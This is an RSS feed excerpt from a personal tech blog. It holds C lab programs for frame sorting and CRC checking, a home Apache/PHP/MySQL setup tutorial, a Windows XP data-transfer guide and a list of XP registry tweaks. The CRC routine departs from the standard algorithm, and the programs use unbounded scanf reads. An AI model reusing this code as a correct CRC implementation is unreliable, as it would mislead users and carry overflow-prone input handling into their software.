  if(arr[j].fslno&gt;arr[j+1].fslno)&lt;br /&gt;
{&lt;br /&gt;
temp=arr[j];&lt;br /&gt;
arr[j]=arr[j+1];&lt;br /&gt;
arr[j+1]=temp;&lt;br /&gt;
ex++;&lt;br /&gt;
}&lt;br /&gt;
if(ex==0)break;&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
int main()&lt;br /&gt;
{&lt;br /&gt;
int i;&lt;br /&gt;
&lt;br /&gt;
printf("Enter the no of frames");&lt;br /&gt;
scanf("%d",&amp;n);&lt;br /&gt;
printf("Enter the frame sequence and contents\n");&lt;br /&gt;
for(i=0;i&lt;n;i++)&lt;br /&gt;
scanf("%d%s",&amp;arr[i].fslno,&amp;arr[i].finfo);&lt;br /&gt;
sort();&lt;br /&gt;
printf("The frame in sequence\n");&lt;br /&gt;
for(i=0;i&lt;n;i++)&lt;br /&gt;
printf("Sequence No:\t%d\t%s\t\n",arr[i].fslno,arr[i].finfo);&lt;br /&gt;
return 0;&lt;br /&gt;
}</description><link>http://zts-zts.blogspot.com/2010/03/frame-sorting.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-7145973346621842413</guid><pubDate>Mon, 01 Mar 2010 12:43:00 +0000</pubDate><atom:updated>2010-03-01T04:47:10.384-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Networks-programs</category><title>CRC Program</title><description>#include"stdio.h"&lt;br /&gt;
#include"string.h"&lt;br /&gt;
#define poly 0x1021&lt;br /&gt;
char original[1000];&lt;br /&gt;
char verified[1000];&lt;br /&gt;
unsigned short original_crc;&lt;br /&gt;
unsigned short verified_crc;&lt;br /&gt;
unsigned short original_text_length;&lt;br /&gt;
unsigned short verified_text_length;&lt;br /&gt;
int main()&lt;br /&gt;
{&lt;br /&gt;
void update_original_crc(unsigned short);&lt;br /&gt;
void update_verified_crc(unsigned short);&lt;br /&gt;
void augment_original_crc();&lt;br /&gt;
void augment_verified_crc();&lt;br /&gt;
unsigned short ch,i=0;&lt;br /&gt;
original_crc=0xffff;&lt;br /&gt;
verified_crc=0xffff;&lt;br /&gt;
original_text_length=0;&lt;br /&gt;
verified_text_length=0;&lt;br /&gt;
printf("enter original text:\n");&lt;br /&gt;
scanf("%s",original);&lt;br /&gt;
printf("enter verified text:\n");&lt;br /&gt;
scanf("%s",verified);&lt;br /&gt;
while((ch=original[i])!=0)&lt;br /&gt;
{&lt;br /&gt;
update_original_crc(ch);&lt;br /&gt;
i++;&lt;br /&gt;
original_text_length++;&lt;br /&gt;
}&lt;br /&gt;
i=0;&lt;br /&gt;
while((ch=verified[i])!=0)&lt;br /&gt;
{&lt;br /&gt;
update_verified_crc(ch);&lt;br /&gt;
i++;&lt;br /&gt;
verified_text_length++;&lt;br /&gt;
}&lt;br /&gt;
augment_original_crc();&lt;br /&gt;
augment_verified_crc();&lt;br /&gt;
printf("\n crc original text=%04x\n",original_crc);&lt;br /&gt;
printf("length of originaltext=%u\n",original_text_length);&lt;br /&gt;
printf("\n crc verified text=%04x\n",verified_crc);&lt;br /&gt;
printf("length of verified text=%u\n",verified_text_length);&lt;br /&gt;
if(original_crc!=verified_crc)&lt;br /&gt;
printf("data(crc)mismatched!\n");&lt;br /&gt;
else&lt;br /&gt;
printf("data(crc)matched!\n");&lt;br /&gt;
}&lt;br /&gt;
void update_original_crc(unsigned short ch)&lt;br /&gt;
{&lt;br /&gt;
unsigned short i,v,xor_flag;&lt;br /&gt;
v=0x80;&lt;br /&gt;
for(i=0;i&lt;8;i++)
{
if(original_crc &amp; 0x8000)
{
xor_flag=1;
}
else
{
xor_flag=0;
}
original_crc=original_crc&lt;&lt;1;
if(ch &amp; v)
{
original_crc=original_crc^poly;

}
if(xor_flag)
{
original_crc=original_crc^poly;
}
v=v&gt;&gt;1;&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void update_verified_crc(unsigned short ch)&lt;br /&gt;
{&lt;br /&gt;
unsigned short i,v,xor_flag;&lt;br /&gt;
v=0x80;&lt;br /&gt;
for(i=0;i&lt;8;i++)
{
if(verified_crc &amp; 0x8000)
{
xor_flag=1;
}
else
{
xor_flag=0;
}
verified_crc=verified_crc&lt;&lt;1;
if(ch &amp; v)
{
verified_crc=verified_crc^poly;

}
if(xor_flag)
{
verified_crc=verified_crc^poly;
}
v=v&gt;&gt;1;&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
void augment_original_crc()&lt;br /&gt;
{&lt;br /&gt;
unsigned short i,xor_flag;&lt;br /&gt;
for(i=0;i&lt;16;i++)&lt;br /&gt;
{&lt;br /&gt;
if(original_crc &amp; 0x8000)&lt;br /&gt;
{&lt;br /&gt;
xor_flag=1;&lt;br /&gt;
}&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
xor_flag=0;&lt;br /&gt;
}&lt;br /&gt;
original_crc=original_crc&lt;&lt;1;&lt;br /&gt;
if(xor_flag)&lt;br /&gt;
{&lt;br /&gt;
original_crc=original_crc^poly;&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
void augment_verified_crc()&lt;br /&gt;
{&lt;br /&gt;
unsigned short i,xor_flag;&lt;br /&gt;
for(i=0;i&lt;16;i++)&lt;br /&gt;
{&lt;br /&gt;
if(verified_crc &amp; 0x8000)&lt;br /&gt;
{&lt;br /&gt;
xor_flag=1;&lt;br /&gt;
}&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
xor_flag=0;&lt;br /&gt;
}&lt;br /&gt;
verified_crc=verified_crc&lt;&lt;1;&lt;br /&gt;
if(xor_flag)&lt;br /&gt;
{&lt;br /&gt;
verified_crc=verified_crc^poly;&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
}</description><link>http://zts-zts.blogspot.com/2010/03/crc-program.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-3398240756012265458</guid><pubDate>Mon, 28 Sep 2009 06:27:00 +0000</pubDate><atom:updated>2009-09-27T23:33:08.134-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>Your Own Home Server - Introduction</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYMcbRhPUeNM65ufYDIq92npgkvyf-QLUA6ZgDqBQCct6VAqPKwAIJW2V3nOKNt9TjRBOMlxKkThA5S8h0LMghyphenhyphenJWQ2zopGlg9as3sgdNxZ6THBGhyphenhyphenERlkY_7GyV-MITJchp2bTDz_vdg/s1600-h/apache.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 172px; height: 155px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYMcbRhPUeNM65ufYDIq92npgkvyf-QLUA6ZgDqBQCct6VAqPKwAIJW2V3nOKNt9TjRBOMlxKkThA5S8h0LMghyphenhyphenJWQ2zopGlg9as3sgdNxZ6THBGhyphenhyphenERlkY_7GyV-MITJchp2bTDz_vdg/s400/apache.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5386402549147948706" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;An Introduction&lt;br /&gt;&lt;br /&gt;In this tutorial you will learn how to step up your own server. This server will be comprised of Apache 1.3.5, PHP 4.2.0, and MySQL 3.23.49. This tutorial will address the basic setup of a server on your own computer. This means the removal of hassles of dealing with the company that is running a remote web server. It will be easy to modify. You can add any thing you want to it, be it CGI/Perl, Zope, Roxen, etc, all by your self. You will have unlimited disk space, well at least as big as your hard drive is =) Now that you know the advantages, it is time that I tell you what i used, and what you will need.&lt;br /&gt;&lt;br /&gt;What I used&lt;br /&gt;* Windows 2000 - NOTE that if you are using 2k you WILL NEED Administrative Privileges. If you don't then get them somehow =) If you are on 95, 98, NT, XP, ME, I&lt;br /&gt;* Apache 1.3.6 - I tried to use 2.0 but I could not get it work. I also feel that 1.3.6 is tried and true, so why mess with greatness.&lt;br /&gt;* Mysql 3.23.49 - The newest version of MySQL when I set up my server. MySQL also the is the best PHP supported Database, and well love PHP don't we.&lt;br /&gt;* PHP 4.2.1 - The latest and greatest PHP release. -nt&lt;br /&gt;&lt;br /&gt;What you will need&lt;br /&gt;* Apache 2 - Link: h**p://www.apache.org/dist/&lt;br /&gt;* Mysql 3.23.49 - Link: h**p://www.mysql.com/downloads/mysql-3.23.html&lt;br /&gt;* PHP 4.2.0 - Link: h**p://www.php.net/downloads.php&lt;br /&gt;* Windows - This tutorial is ONLY written for new versions of Windows.&lt;br /&gt;&lt;br /&gt;Once you have downloaded all the programs you are ready to continue.&lt;br /&gt;&lt;br /&gt;1. Installing Apache&lt;br /&gt;&lt;br /&gt;Installing Apache&lt;br /&gt;&lt;br /&gt;The first step is to download Apache for Windows. Before you install it make sure that any other server software is removed. Remove it all via the control panel.On&lt;br /&gt;&lt;br /&gt;Once you have clicked on the executable, a screen should com up that looks like this. Go ahead and click on next&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;Of course you plan to abide be the license agreement, so click on I accept.... and click on next.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;You really don't need to read this, but if you want you can. Read it if you want feel informed. When you are ready click on next.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;Here is where the actual setup of Apache begins. For Network Domain put in localhost as for Server Name You want these both to be localhost because the server is running locally, on your computer. It doesn't matter what is in email field, just put in yours. No one will no it because it's just you.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;For the sake of this tutorial it is better to just leave it as it is because, later in the tutorial I will show you how to start the server with one click of the mouse, and for the sake of ease, it will be easier for you to follow along. You can change it if you want, but you will have to realize where to substitute it. For me the root drive is E: but for you will probably be C:&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;Once you have all the jazz set up, it is time to install the server. If you are on w2k or XP be sure that you have Administrative permissions or you will get an error about half way through the install saving cannot access msvrt32.dll or something. If you get that error run it again when you have admin privileges. Once you are ready click on install.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;If all went well you just see a screen similar to this. Now it is time to test the install of apache. Click on Start &gt; Program Files &gt; Apache HTTP Server and look for start Start Apache in Console. Click it. Once it says Apache XXXXX running, press Windows Key + R and type -http://localhost/. If the install works you should see a page saying that it works. If all is set and done, continue to the next step.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;______________________________________________________________________&lt;br /&gt;2. Installing PHP&lt;br /&gt;Once you have clicked on the executable, a screen should come up that looks like this. Go ahead and click on next.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;Of course you plan to abide be the license agreement, so click on I accept.... and click on next.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;For this information, we will want the simple standard install. Chances are you if you are reading this tutorial, you will probably not even want to talk about advanced =)&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;This is the mail setup, just enter localhost, and me@localhost.com. These are not important, because you, the admin, are the only person that will use the server, and you will be the one handling errors.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;We are going to want this install to work is Apache, so click on Apache, and move on.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;Once you have all the jazz set up, it is time to install the server. If you are on w2k or XP be sure that you have Administrative permission or you will get an error about half way through the install saving cannot access msvrt32.dll or something. If you get that error run it again when you have admin privileges. Once you are ready click on install.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;After the install is done you should get something that says you will have to manually configure apache to use php. Assuming you have a working Apache server installed, make sure that it is not running. Navigate to C:\Program Files\Apache Group\Apache\conf\ open the httpd.conf file. Note that you can also get to the http.conf from the start menu. Start &gt; Program File &gt; Apache HTTP Server &gt; Configure Apache Server &gt; Edit the Apache httpd.conf Configuration File and the window will open up in notepad. Now hit Ctrl + End if you see something like what follows, you can skip this step. If you do not see that code, copy it. This code will only work if you used the default install folder when you installed php. If you did, copy that code and paste it into the end of the file. Select the code to right, and hit crtl + c , then go into the httpd.conf file and hit ctrl + v and save the file.&lt;br /&gt;&lt;br /&gt;ScriptAlias /php/ "c:/php/"&lt;br /&gt;&lt;br /&gt;AddType application/x-httpd-php .php .phtml&lt;br /&gt;&lt;br /&gt;Action application/x-httpd-php "/php/php.exe"&lt;br /&gt;&lt;br /&gt;Now that we have php installed, it is time to test it. Open up notepad and type the code to the right. Save it as phpinfo.php. Remember to set it as all files in the drop down menu, or the file will be a text file. Save in the Directory: C:\Program Files\Apache Group\Apache\htdocs. htdocs is the directory where all the files go. You can create endless dir's and browse them. For Example E:\Program Files\Apache Group\Apache\htdocs\mydir\myfile.php could be accessed as http://localhost/mydir/myfile.php. Once you have that file saved. You will need to start the Server. Click: Start &gt; Program File &gt; Apache HTTP Server &gt;; and look for something like Start Apache in Console. After you have found it, launch it. You should get a window saying that Apache is running. Now go to Start &gt; Run &gt; and type in -http://localhost/phpinfo.php. If you don't see anything, php is not installed correctly. If php is installed correctly, you will see a few large tables, displaying php's configuration. Now Your are 1/2 done!&lt;br /&gt;______________________________________________________________________&lt;br /&gt;3. Installing MySQL&lt;br /&gt;Once you have clicked on the executable, a screen should com up that looks like this. Go ahead and click on next.&lt;br /&gt;&lt;br /&gt;user posted image&lt;br /&gt;&lt;br /&gt;Of course you plan to abide be the license agreement, so click on I accept.... and click on next.&lt;br /&gt;&lt;br /&gt;Just like before you should leave the default dir alone, so you will be able to follow along with me when I show you how to start and stop all the aspects of the server.&lt;br /&gt;&lt;br /&gt;Stay with the typical installation. Just like before, if you don't have admin privileges, the install will be faulty. After you click next, the install will begin. After the install has finished, move on to the next step.&lt;br /&gt;&lt;br /&gt;Now you have to set up the root account. The root account is the absolute admin of the system, the highest possible. Click on Start &gt; Run and type cmd to open up the command prompt. You are going to have to navigate to where MySQL is installed. Type C: &gt; Enter &gt; cd mysql &gt; Enter &gt; cd bin &gt; Enter. Now you have to tell setup the root settings. Type mysqladmin -uroot password InsertYourPasswordHere then hit enter.&lt;br /&gt;&lt;br /&gt;To see an image of the screen, -h**p://www.webmasterstop.com/tutorials/images/doscreen1.gif&lt;br /&gt;&lt;br /&gt;What is the point of having a database if you can't easily administer it! That is where phpMyAdmin comes into play. phpMyAdmin is a free piece of software written in php that makes the administration of a mysql or many other types of databases easy. You will want to download (h**p://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.6-php.zip?downloadrelease_id=85832)the latest version. Save it in the htdocs folder. Once it is done downloading it, right click on it and select Extract &gt; To Here. When it is done you should end up with a directory in the htdocs folder called phpMyAdmin-2.2.6 To make it easier to access, rename it to phpMyAdmin. After you have renamed it, click on it and look for a file called config.inc Open it. This is where you set the configuration of phpMyAdmin. When you open it up, it should look similar to the image to your side. On yours there should be a few things missing. The $cfgPmaAbsoulteUrl and $cfgservers[$i]['password']. You will need to fill those in between the quotes. for the $cfgPmaAbsoulteUrl enter -http://localhost/phpMyAdmin/ if you followed my instructions to the letter. If you did not rename it or extracted to a different directory, put that in there. For the $cfgservers[$i]['password'] enter the password you entered when you were setting MySQL in the set above. You can refer to the image for help. After you have put the right things in save the file.&lt;br /&gt;&lt;br /&gt;To see an image of the screen, -h**p://www.webmasterstop.com/tutorials/images/phpmyadminscreen1.gif&lt;br /&gt;&lt;br /&gt;Now we want to test the install of mysql, php, phpmyadmin, and apache all at once. Start apache in console like we did before. Now, you are going to need to start mysql. For myself I made a file that would start mysql for me. Open notepad and type: start c:\mysql\bin\mysqld-nt.exe --standalone and save that as Start MySQL.bat. Once you have saved it, click it. A window should open and then close. Mysql is now running on your computer. After mysql and apache are started go to run again and type -http://localhost/phpMyAdmin/index.php and if everything is installed correctly phpmyadmin should so up. You are almost done! Now we have the easy part =)&lt;br /&gt;&lt;br /&gt;4. Finishing it all up&lt;br /&gt;&lt;br /&gt;Wow! We mad it through the whole process. Now we want to simplify the whole process of controlling the server. I made a toolbar with all the things I needed. I made a new folder on my desktop and called it Server Folder and put all the stuff there. I made a new shortcut and gave it a value of -http://localhost/ made a shortcut to the PHP Documentation page. Another shortcut to my php editor, which is now unavailable. The phpMyAdmin shortcut is set to -http://localhost/phpMyAdmin/index.php. I made another shortcut htdocs. I moved the Start Apache in Console program that was in the start menu folder and moved it to the server folder. You can take the Start Mysql file you made in the last page and move it to the new folder. After you have put all the desired things into that folder, right click on a blank space in stat menu task bar (where the program boxes lie) and select Toolbars &gt; New Toolbar and navigate to the folder. Voila!&lt;br /&gt;&lt;br /&gt;Now all you have to do is click Start Apache in Console , Start Mysql, and Lauch browser biggrin.gif&lt;br /&gt;&lt;br /&gt;Here You Are Guys</description><link>http://zts-zts.blogspot.com/2009/09/your-own-home-server-introduction.html</link><author>noreply@blogger.com (Sharath)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYMcbRhPUeNM65ufYDIq92npgkvyf-QLUA6ZgDqBQCct6VAqPKwAIJW2V3nOKNt9TjRBOMlxKkThA5S8h0LMghyphenhyphenJWQ2zopGlg9as3sgdNxZ6THBGhyphenhyphenERlkY_7GyV-MITJchp2bTDz_vdg/s72-c/apache.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-8737360137352404878</guid><pubDate>Mon, 28 Sep 2009 06:25:00 +0000</pubDate><atom:updated>2009-09-27T23:25:55.729-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Xp-Tricks</category><title>Transfering data</title><description>Transferring Data&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Moving data between your old and new PC has never been so simple. This guide shows you how with File and Settings Transfer Wizard&lt;br /&gt;&lt;br /&gt;Transferring data&lt;br /&gt;&lt;br /&gt;Having decided to upgrade to a newer PC, the euphoria of being the proud owner of a spanking new system can suddenly be cut short. The problem is, there’s all that data that needs to be transferred from your old machine to your new one. It can be difficult trying to decide which files and folders are to be copied over, and then there are the program settings for the individual applications that you have installed. Take a moment to think about the other items too, including email messages and account information, not to mention your Internet connection settings. All these will need to be moved from one PC to the other. If you’re in the position of upgrading to a Windows XP system then you should make full use of the ‘File and Settings Transfer Wizard.’ This built-in utility makes light work of moving important data and settings from one PC to another.&lt;br /&gt;&lt;br /&gt;The File and Settings Transfer Wizard will work with any Windows operating system. It will enable you to transfer data from Windows 95 upwards, restoring files and settings in the both the Home and Professional Editions of Windows XP. Your data can be moved using a variety of methods. For example, you can use a direct connection between the two PCs, perhaps a network or a cable link. Alternatively, you can create a file that contains all the transferable data and save it to a hard drive partition or removable media such as a recordable CD/DVD or Zip disk.&lt;br /&gt;&lt;br /&gt;Full control&lt;br /&gt;The settings within the wizard enable you to back up as much or as little of your existing data as you want. Not only will you be able to transfer your files and folders, but it’s also possible to incorporate individual user settings. Details of desktop display, wallpaper and themes, folder settings and Internet connection information can all be saved. You can also copy over elements of Internet Explorer that you’ll require on your new PC. These include Favorites, cookies and security certificates. Information contained within Outlook and Outlook Express, such as email settings and address books can also be transferred. However, if you’ve created Identities in Outlook Express, any messages and folders won’t be copied over separately. Instead, all messages will end up being grouped together.&lt;br /&gt;&lt;br /&gt;One aspect of the File and Settings Transfer Wizard that you’ll find particularly useful, enables Registry settings and preferences from applications to be transferred. It works well for both Microsoft and non-Microsoft programs. Should the wizard encounter an application that it’s unable to deal with then you’ll be informed accordingly.&lt;br /&gt;&lt;br /&gt;Getting started&lt;br /&gt;In order to transfer data from an old PC to your new system you’ll need to have your original Windows XP installation CD to hand. When the menu appears, choose ‘Perform Additional Tasks’ and select ‘Transfer Files and Settings.’ Click Next and under ‘Select a Transfer Method’ you’ll have to choose how the information is to be copied over. Having both machines on a network is the easiest method of transferring your data. Without some kind of direct connection you should select ‘Floppy drive or other removable media’. This will enable you to use media such as a recordable CD/DVD.&lt;br /&gt;&lt;br /&gt;With your chosen method selected, click Next and decide exactly want you want to back up. Select ‘Both files and settings’ as it’s best to be as thorough as possible and remember to check the option that will enable you to make your own selections. On the next screen you’ll see specific files, folders and settings that are to be backed up. Leave everything selected unless you’re sure there’s something there that you don’t need. The default selections will ensure that the items, My Documents and My Pictures are selected for back up. However, you’ll need to make sure that any folders you’ve created are included in the transfer process. To do this click Add Folder and Add File and select exactly what you want. Once you’re sure you’ve got everything you need for the transfer click on Next and wait while the information is collected from your system. This may take a while if there’s a lot of content coming over from your old PC.&lt;br /&gt;&lt;br /&gt;Don’t worry if the amount of data you’re transferring exceeds the capacity of the removable media you’ve decided to use. The File and Settings Transfer Wizard will automatically span the backed up data over as many disc sets that you require. This will enable you to restore the information with ease. With the transfer of data completed, click on Finish. Now you’re ready to restore the data on your new PC. Having got this far you’re probably wondering if this Transfer Wizard could be used as a regular back-up tool, even though its intended use is to transfer data from one PC to another. Although, Windows XP comes with its own dedicated back-up utility, the File and Settings Transfer Wizard is ideal if you want to back up specific items and system configuration settings.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Using the File and Settings Transfer Wizard&lt;br /&gt;&lt;br /&gt;* Place the original Windows XP CD in the drive of your old PC, choose ‘Perform Additional Tasks’ and choose ‘Transfer Files and Settings’ then click Next. Select Old PC then under ‘Select a Transfer Method’ choose how you want to copy the info.&lt;br /&gt;* If space of media capacity is at a premium then Settings only should be your preferred option. The Files only option covers specific folders including the Desktop and My Documents. So, ideally you should choose ‘Both files and settings’.&lt;br /&gt;* Choose to select from a ‘Custom list of files’ and you can click Add Setting, Add Folder, Add File and Add File Type, to include your own items. Having selected all the items to be transferred, click Next and wait for the process to complete.&lt;br /&gt;* With everything now backed up it’s time to move over to the Windows XP machine. Click Start -&gt; All Programs -&gt; Accessories -&gt; System Tools -&gt; File and Settings Transfer Wizard. Select the New computer option, click Next and wait.&lt;br /&gt;* Choose the final option ‘I have already collected my files and settings from my old computer’ and click Next. Select the location of the stored files whether it’s cable, removable media or drive location and click Next.&lt;br /&gt;* It’s not possible to be selective with the info that you import on to your new machine. All the data and application configuration settings will be transferred in one go. If there’s anything you don’t need you’ll have to delete it afterwards</description><link>http://zts-zts.blogspot.com/2009/09/transfering-data.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-6483904368884211965</guid><pubDate>Mon, 28 Sep 2009 06:23:00 +0000</pubDate><atom:updated>2009-09-27T23:23:42.393-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Xp-Tricks</category><title>Xp-Tweaks</title><description>Some Tips And Tricks For Your Windows XP&lt;br /&gt;&lt;br /&gt;STOP NOISE IN COPYING AUDIO CD&lt;br /&gt;When using 3rd party burning software (eg, Nero Burning Rom) to copy audio CD,some noise may be heard at the end of each track. To prevent this,try the following method:&lt;br /&gt;1. Enter System Properties\device manager&lt;br /&gt;2. Select IDE ATA/ATAPI controllers&lt;br /&gt;3. Double click on thee CD writer IDE channel&lt;br /&gt;4. Select advance setting&lt;br /&gt;5. Change the transfer mode to 'PIO Only'&lt;br /&gt;6. Restart Computer&lt;br /&gt;&lt;br /&gt;DISABLING THE 'UNSIGNED DRIVER' DIALOGS&lt;br /&gt;This option wll disable the screen wich keeps popping up when you try to install 'digitally unsigned drivers'. Normally you can choose to continue the install anyways, but I have had situations where you cannot continue the install.. very annoying.. This is how to fix it:&lt;br /&gt;Click Start - Run&lt;br /&gt;then type: gpedit.msc&lt;br /&gt;then hit enter.&lt;br /&gt;Browse the folder tree to the following location:&lt;br /&gt;User Configuration - Administrative Templates - System&lt;br /&gt;now right-click Code signing for Device drivers and select Properties.&lt;br /&gt;On the Settings tab, either select&lt;br /&gt;- enable, and then select ignore from the appearing listbox..&lt;br /&gt;- or click the disable option. Click apply and Ok and your set!&lt;br /&gt;Alternatively especially for XP Home users:&lt;br /&gt;Open "System" properties (Windows key + pause or Right click 'My Computer' - properties or Control Panel - System).On the Hardware tab click the "Driver Signing" button. In the dialogue that comes up choose "Ignore" to install the new driver anyway.&lt;br /&gt;&lt;br /&gt;DMA MODE ON IDE DEVICES VIEWS&lt;br /&gt;Just like Windows 2000, Windows XP still fails to set the DMA mode correctly for the IDE device designated as the slaves on the primary IDE and secondary IDE channels. Most CD-ROMS are capable of supporting DMA mode, but the default in XP is still PIO. Setting it to DMA won't make your CD-ROM faster, but it will consume less CPU cycles. Here's how:&lt;br /&gt;1. Open the Device Manager. One way to do that is to right click on "My Computer", select the Hardware tab, and Select Device Manager.&lt;br /&gt;2. Expand "IDE ATA/ATAPI Controllers" and double-click on "Primary IDE Channel"&lt;br /&gt;3. Under the "Advanced Settings" tab, check the "Device 1" setting. More than likely, your current transfer mode is set to PIO.&lt;br /&gt;4. Set it to "DMA if available".&lt;br /&gt;Repeat the step for the "Secondary IDE Channel" if you have devices attached to it. Reboot.&lt;br /&gt;&lt;br /&gt;RESTORING MEDIA PLAYER&lt;br /&gt;To restore Windows Media Player insert the the XP CD into the CD drive (if it autostarts click exit). Open a command window and type the following :&lt;br /&gt;rundll32.exe setupapi,InstallHinfSection InstallWMP7 132 c:\windows\inf\wmp.inf&lt;br /&gt;&lt;br /&gt;RESTORING ACCESS TO CD ROM'S&lt;br /&gt;If you removed CD Burning software, or for some other mystical reason, can not longer access your CD ROM's, in most cases following registry keys needs to be deleted: Locate and delete the UpperFilters and LowerFilters values under the following key in the registry:&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}&lt;br /&gt;&lt;br /&gt;DELETING THE INDEX.DAT&lt;br /&gt;Del "C:\Documents and Settings\aeon\Local Settings\Temporary Internet Files\Content.IE5\index.dat"&lt;br /&gt;&lt;br /&gt;CONTROL PANEL ON THE DESKTOP.&lt;br /&gt;On The Desktop, Right Click Your Mouse Then Choose "New | Folder". Name The Folder As "ControlPanel. {21EC2020-3AEA-1069-A2DD-08002B30309D}" Without The "Quote Things. And Now You Can Access The Control Panel More Faster Then Before.&lt;br /&gt;&lt;br /&gt;CHANGING INTERNET EXPLORER ICON NAME.&lt;br /&gt;Open Registry Editor Then Go To : "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID". You Can See A Few Key Below It.&lt;br /&gt;&lt;br /&gt;Now Go To This Key {871C5380-42A0-1069-A2EA-08002B30309D}, Double Click At The Default Value On The Right, Enter Whatever Name You Like.&lt;br /&gt;&lt;br /&gt;REMOVING USERNAME IN THE STARTMENU&lt;br /&gt;Open Registry Editor Then Go To : "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer".&lt;br /&gt;On The Right, Make A New Entry With Right Click On Your Mouse Then Choose "New | DWORD Value" Change The Entry's Name Into "NoUserNameInStartMenu", Double Click In The New Entry And Fill The "Value Data" With "1". Press OK, Exit From The Registry Editor. Restart Your Computer.&lt;br /&gt;&lt;br /&gt;INTERNET EXPLORER LIGHTING-FAST STARTUP.&lt;br /&gt;Isn't it annoying when you want to go to a new website, or any other site but your homepage, and you have to wait for your 'home' to load? This tweak tells Internet Explorer to simply 'run', without loading any webpages. (If you use a 'blank' page, that is still a page, and slows access. Notice the 'about:blank' in the address bar. The blank html page must still be loaded..). To load IE with 'nothing' [nothing is different than blank]:&lt;br /&gt;1. Right-click on any shortcut you have to IE&lt;br /&gt;[You should create a shortcut out of your desktop IE icon, and delete the original icon]&lt;br /&gt;2. Click Properties&lt;br /&gt;3. Add ' -nohome' [with a space before the dash] after the endquotes in the Target field.&lt;br /&gt;4. Click OK&lt;br /&gt;Fire up IE from your modified shortcut, and be amazed by how fast you are able to use IE!&lt;br /&gt;&lt;br /&gt;INTERNET EXPLORER SPEED UP.&lt;br /&gt;Edit your link to start Internet Explorer to have -nohome after it. For Example: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome&lt;br /&gt;This will load internet explorer very fast because it does not load a webpage while it is loading. If you want to go to your homepage after it is loaded, just click on the home button.&lt;br /&gt;&lt;br /&gt;SPEED UP BROWSING WITH DNS CATCH.&lt;br /&gt;when you connect to a web site your computer sends information back and forth, this is obvious. Some of this information deals with resolving the site name to an IP address, the stuff that tcp/ip really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although WinXP and win2000 has a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:&lt;br /&gt;************begin copy and paste***********&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]&lt;br /&gt;"CacheHashTableBucketSize"=dword:00000001&lt;br /&gt;"CacheHashTableSize"=dword:00000180&lt;br /&gt;"MaxCacheEntryTtlLimit"=dword:0000fa00&lt;br /&gt;"MaxSOACacheEntryTtlLimit"=dword:0000012d&lt;br /&gt;************end copy and paste***********&lt;br /&gt;make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Then merge it into the registry.&lt;br /&gt;&lt;br /&gt;START IEXPLORER WITH EMPTY BLUE SCREEN.&lt;br /&gt;Set your default page to about:mozilla and IE will show a nice blue screen upon startup.&lt;br /&gt;&lt;br 